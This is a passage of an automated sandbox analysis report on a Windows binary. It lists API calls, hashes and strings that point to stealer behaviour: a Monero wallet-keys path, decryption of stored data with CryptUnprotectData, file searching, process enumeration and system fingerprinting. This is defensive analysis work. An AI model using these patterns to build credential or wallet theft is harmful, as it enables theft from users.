                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: be079070a534a6ec194205869907e7396393c63efb7df9f74969ac1a2677e4bc
                                    • Instruction ID: 8e01da9c768eab44249b8400143ef37e1e6520e3dcd171d9ee37bf4cd4fbecea
                                    • Opcode Fuzzy Hash: be079070a534a6ec194205869907e7396393c63efb7df9f74969ac1a2677e4bc
                                    • Instruction Fuzzy Hash: 0611EC75A18318ABDF24DFA6EC48BDDB7B9AB49701F00458CF509A6240DB749B84DFA0
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,006A05B7), ref: 00697D71
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00697D89
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00697D9D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00697DF2
                                    • LocalFree.KERNEL32(00000000), ref: 00697EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 9c9ebeb78fdc61fc61627f731e89a08bb34a21a252aee49d2314e71c4de74eef
                                    • Instruction ID: 2e4eff188c28de2ea07b79cee91e46efaed6fa924ad104f32295a2f3ddeb26d6
                                    • Opcode Fuzzy Hash: 9c9ebeb78fdc61fc61627f731e89a08bb34a21a252aee49d2314e71c4de74eef
                                    • Instruction Fuzzy Hash: A3417F71954218ABCF64DB94DC99BEEB3BAFF44700F1041D9E00A66680DB342F84CFA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'u?_$* {>$@v_$_4{_$op}$s7{_$r@W
                                    • API String ID: 0-880996861
                                    • Opcode ID: 94ddfdb7d2b3033fc2531dea5f3161298eb33e7433523a07823252a03383075b
                                    • Instruction ID: 7a4cbadad203409375e53832745b10c37525fc42bf9c2fb2f142599b5cd04282
                                    • Opcode Fuzzy Hash: 94ddfdb7d2b3033fc2531dea5f3161298eb33e7433523a07823252a03383075b
                                    • Instruction Fuzzy Hash: 6C62F8F3A0C2049FE3046E2DEC8577ABBE5EF94720F16463DEAC4D3744EA3558058696
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006A0D79), ref: 0068E5A2
                                    • StrCmpCA.SHLWAPI(?,006A15F0), ref: 0068E5F2
                                    • StrCmpCA.SHLWAPI(?,006A15F4), ref: 0068E608
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068ECDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 3b49c02ac1161e294d4c787e7b5075f6fdea566e53a3aa2ed9933210a42d54a9
                                    • Instruction ID: a41f6632950fdcec6183c0acd448ea02d5e22b0f2c0ed9cde5e4304baec75817
                                    • Opcode Fuzzy Hash: 3b49c02ac1161e294d4c787e7b5075f6fdea566e53a3aa2ed9933210a42d54a9
                                    • Instruction Fuzzy Hash: 88124E72A141189BCF54FBA0DCA6AED73BFAF54300F4045ACA50A56495EE306F48CFDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .4A@$6F~$=tm7$Bmy?$Kq~$^gxy
                                    • API String ID: 0-1048125708
                                    • Opcode ID: 8076367fa81f8bdedb7825ebb7905f9a0d81e59e5ba3a37091fcd2ca769e1bbf
                                    • Instruction ID: cb6d2bd434d5cda88dbe01d60406d2fc7068eb0c52b3cf21f706a9504b6b69cb
                                    • Opcode Fuzzy Hash: 8076367fa81f8bdedb7825ebb7905f9a0d81e59e5ba3a37091fcd2ca769e1bbf
                                    • Instruction Fuzzy Hash: 73B227F360C2009FE3046E2DEC85A7ABBE9EFD4720F16893DE6C4C7744EA7558058696
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A23F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00684F3E,00000000,?), ref: 0068A251
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A27A
                                    • LocalFree.KERNEL32(?,?,?,?,00684F3E,00000000,?), ref: 0068A28F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID: >Oh
                                    • API String ID: 4291131564-3845958440
                                    • Opcode ID: 1172e715e4e4c757b6939924a1c13cdfafb5b677f260bb222a9746746a6bb387
                                    • Instruction ID: 682d262f4b535823a42538924c7ec67791b02d4311fc236d3104de2aae0f8847
                                    • Opcode Fuzzy Hash: 1172e715e4e4c757b6939924a1c13cdfafb5b677f260bb222a9746746a6bb387
                                    • Instruction Fuzzy Hash: 8411D774244308AFEB10CF94DC55FAA77B5EB48B11F208189FD159B390C772AA41CB50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \u$\u${${$}$}
                                    • API String ID: 0-582841131
                                    • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction ID: bb43e0e5e0276d1f6cbab9020a3f99350bebe9f36d99ca15250d0de1ccb9b88c
                                    • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction Fuzzy Hash: 12417C12E19BC9C6CB058B7944A02AEBFB22FD6210F6D42AAC4DD1F383C774414AD3A5
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C971
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C97C
                                    • lstrcat.KERNEL32(?,006A0B47), ref: 0068CA43
                                    • lstrcat.KERNEL32(?,006A0B4B), ref: 0068CA57
                                    • lstrcat.KERNEL32(?,006A0B4E), ref: 0068CA78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: d57e9c0f5a8350bdaee4e1c3a1947a0f4309456788fa626cf6e151b72b187c6e
                                    • Instruction ID: f32e5ffbbf1c855f50b0ff8cef732421479a9475cf2f5bfe58cb6092622003d1
                                    • Opcode Fuzzy Hash: d57e9c0f5a8350bdaee4e1c3a1947a0f4309456788fa626cf6e151b72b187c6e
                                    • Instruction Fuzzy Hash: 0B41607590820DEBDB10DFA4DD89BFEF7B9AB44305F1042A8E509A7280C7755B84DFA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006872AD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006872B4
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006872E1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00687304
                                    • LocalFree.KERNEL32(?), ref: 0068730E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: fa66846703324f6302cc9f5b9ef64b3decb0e18cb02b904865d34718480b6b1f
                                    • Instruction ID: 8b99f054b363b24bf95e0836e034379f82e2bc8505ad3000d045cda521fdd9ac
                                    • Opcode Fuzzy Hash: fa66846703324f6302cc9f5b9ef64b3decb0e18cb02b904865d34718480b6b1f
                                    • Instruction Fuzzy Hash: ED015275A58308BBDB10DFE4DC45F9DB778AB44B01F104144FB05AB2C0C670AB009B65
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006997AE
                                    • Process32First.KERNEL32(006A0ACE,00000128), ref: 006997C2
                                    • Process32Next.KERNEL32(006A0ACE,00000128), ref: 006997D7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 006997EC
                                    • CloseHandle.KERNEL32(006A0ACE), ref: 0069980A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 1bca1ff3664ce8cb843376a837646ff1acdca5c7833a19a21fd77b9f3e82478b
                                    • Instruction ID: c21a62e72fb884c70d67833db59c0fadd967314f00638b723ee3fd751a2b6110
                                    • Opcode Fuzzy Hash: 1bca1ff3664ce8cb843376a837646ff1acdca5c7833a19a21fd77b9f3e82478b
                                    • Instruction Fuzzy Hash: D901E575A18308ABDF20DFA9DD48BEDBBB9AB09701F10458CE509A6240EB709B40DB60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <7\h$huzx
                                    • API String ID: 0-2989614873
                                    • Opcode ID: 5f18074259d281b0860551dfea4af7ba4cad347a03f270f1c3272ae9a0ae856d
                                    • Instruction ID: aea4a02d2e81230bae92791408a552c534991da197f11107c355b79adf23854c
                                    • Opcode Fuzzy Hash: 5f18074259d281b0860551dfea4af7ba4cad347a03f270f1c3272ae9a0ae856d
                                    • Instruction Fuzzy Hash: B063337241EBD41ECB27EB3087B62917F67BA1321031D49CEC4C28B5B3C6949E16EB56
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: F`{$KX{$Sag$rv~
                                    • API String ID: 0-3432570482
                                    • Opcode ID: 2c65165dfa1942c6d9b55adf67db81243a5cec65d8dff0589176ff795e1695f1
                                    • Instruction ID: 8620f00f5e8a02cb2b4c8449d5337116bbd8088d86255911a2f76a7fe70cfa97
                                    • Opcode Fuzzy Hash: 2c65165dfa1942c6d9b55adf67db81243a5cec65d8dff0589176ff795e1695f1
                                    • Instruction Fuzzy Hash: C4B20AF36082049FD304AE2DDC8567AFBE9EF94720F1A8A3DE6C4C7744E63598058697
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,006851D4,40000001,00000000,00000000,?,006851D4), ref: 00699050
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: 1363009dde563b56fc0ee2eabf7b22caf779deb7c990169a0bdda13aad02eeb9
                                    • Instruction ID: dc3f00f169f59f5eacac2b66e9bbc49d6eddd57170136920020e454ca4b67e52
                                    • Opcode Fuzzy Hash: 1363009dde563b56fc0ee2eabf7b22caf779deb7c990169a0bdda13aad02eeb9
                                    • Instruction Fuzzy Hash: 0E11E670204204AFDF04CFA9D885BAA73AEAF89311F10844CF9298B750D676E9419B60
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0DE8,00000000,?), ref: 00697B40
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00697B47
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,006A0DE8,00000000,?), ref: 00697B54
                                    • wsprintfA.USER32 ref: 00697B83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 6edaf1b44e983946ccd973e467f4e5fd1a97916419394147b073e115727e5075
                                    • Instruction ID: e23b95a9c8c4c37cdb6c886de1a456a9d64b63811c54b11fb6de15e4fc2687e0
                                    • Opcode Fuzzy Hash: 6edaf1b44e983946ccd973e467f4e5fd1a97916419394147b073e115727e5075
                                    • Instruction Fuzzy Hash: C0112AB2918218ABCB14DFDAED45BBEF7FCEB4CB12F10411AF615A2280D6395940D7B0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0142DAE8,00000000,?,006A0DF8,00000000,?,00000000,00000000), ref: 00697BF3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00697BFA
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0142DAE8,00000000,?,006A0DF8,00000000,?,00000000,00000000,?), ref: 00697C0D
                                    • wsprintfA.USER32 ref: 00697C47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 3caa018142e811b70b3b358029f40415123ef8e9b94816e9367d19e9e3ca9d16
                                    • Instruction ID: 374ec7fcb5e1a80e5c15039c8ff4e36d440dbaf16b3983d92f156707f3b8af5a
                                    • Opcode Fuzzy Hash: 3caa018142e811b70b3b358029f40415123ef8e9b94816e9367d19e9e3ca9d16
                                    • Instruction Fuzzy Hash: 76118EB1909318EFEB209B55ED45FA9B7B8FB44711F100795F61A932D0DB745A408B50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Dw\$Zb{[${p<${p<
                                    • API String ID: 0-3519044859
                                    • Opcode ID: f870bddbae6d3e5c9066e70dda8b9809cb3f62253f74bd1e80a13553a2f2132a
                                    • Instruction ID: 00b8a2ed6e570808bbee6bf6c922736d80d409faec33c1d5b2bed1d917589a73
                                    • Opcode Fuzzy Hash: f870bddbae6d3e5c9066e70dda8b9809cb3f62253f74bd1e80a13553a2f2132a
                                    • Instruction Fuzzy Hash: 287124F3E082105BE3009A3CDC4576AB7E6EFD4720F1B853DDE88D7784E93998058696
                                    APIs
                                    • CoCreateInstance.COMBASE(0069E120,00000000,00000001,0069E110,00000000), ref: 006939A8
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00693A00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: 34816cc419f13fafecc67ddc7369a0e44b8f2669c699a3e395d88bee4d2657b9
                                    • Instruction ID: c90568a8be702b003f1c80c34f3513e0fe17ff0676ae146d6d4637e6b8b50a31
                                    • Opcode Fuzzy Hash: 34816cc419f13fafecc67ddc7369a0e44b8f2669c699a3e395d88bee4d2657b9
                                    • Instruction Fuzzy Hash: C741E870A44A289FDB24DB58CC95F9BB7B9BB48702F4041D8E618E72E0D7B16E85CF50
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0068A2D4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 0068A2F3
                                    • LocalFree.KERNEL32(?), ref: 0068A323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: c54af02b050cd776655319e0c6a3c9db117a9439b2651cac8205229edb1fa4ec
                                    • Instruction ID: 1727402159d6b45303dc2cf8cd7f4a2c3dce83f8ef1d9c44d6f164995567cdca
                                    • Opcode Fuzzy Hash: c54af02b050cd776655319e0c6a3c9db117a9439b2651cac8205229edb1fa4ec
                                    • Instruction Fuzzy Hash: ED11E5B8A04209EFDB04DFA5D884AAEB7B5FB88301F104559FD15A7350D770AE50CB61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?$__ZN
                                    • API String ID: 0-1427190319
                                    • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction ID: f2a1fcc32b60eb68451fd33e7ebbd332f2c05ee99343aa1f1a10f56beab5de5f
                                    • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction Fuzzy Hash: 73721272908B189BD714CF18C8906BAB7E3BFC5310F598A1DFBA69B391D7709C419B81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ~
                                    • API String ID: 0-2946903494
                                    • Opcode ID: 278ebe8acb3d5264434875092daf1f04241a366e1302d6d79b2e4c4e644309c5
                                    • Instruction ID: ee6fa37a26bcfc34b34582f02973c7acccc96a7ca7f980e78031f9db217d31ef
                                    • Opcode Fuzzy Hash: 278ebe8acb3d5264434875092daf1f04241a366e1302d6d79b2e4c4e644309c5
                                    • Instruction Fuzzy Hash: 69B2F4F360C2049FE304BE2DEC8567ABBE9EF94720F16893DE6C483744EA3559058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: F<{'$F<{'
                                    • API String ID: 0-2745900745
                                    • Opcode ID: 2f331e7f73ed3dd6b301a54b4d91bf2a80e3ccf4ee8e37ee8e4530a041f0a29d
                                    • Instruction ID: c3f229bf614783071bb28ac234aa399e3b4b845d301fb5f6bae5a0f35ab51698
                                    • Opcode Fuzzy Hash: 2f331e7f73ed3dd6b301a54b4d91bf2a80e3ccf4ee8e37ee8e4530a041f0a29d
                                    • Instruction Fuzzy Hash: F97116F36083089FE304AE2DDC4476BB7DADBD0720F19893DEA85C7784E935AD058656
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0Fe/$8W}
                                    • API String ID: 0-3065181798
                                    • Opcode ID: c750390556eb2ed3375e6c263d97b80921fca933fa1fa25c166a0e58b8821e6e
                                    • Instruction ID: 438ad8997aab3cf5ff5d8b0fc18933cbd35bffae0e9f854469b105921bf0ddfe
                                    • Opcode Fuzzy Hash: c750390556eb2ed3375e6c263d97b80921fca933fa1fa25c166a0e58b8821e6e
                                    • Instruction Fuzzy Hash: 775147F3A483149FE3046E3DED8536ABBD5EB94320F1B453DEB88D3780E93958058296
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: xn--
                                    • API String ID: 0-2826155999
                                    • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction ID: 0aff9fc3f576700e821fe0cf8f665787921c687adfc2bfec86137408f5a70d92
                                    • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction Fuzzy Hash: D7A2F4B1C042688AEF28CB58C8907EDB7B3EF55300F1842ABE4567B381D7759E85DB61
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction ID: 5d1472164a70f7d9a8428a58cc7afc846967a30d0fdcff03910ae4b4fa51632f
                                    • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction Fuzzy Hash: A2E1AC31A083459FC725DF28C8817AEB7E3ABC9300F55492EE5DA9B391DB319C45CB86
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
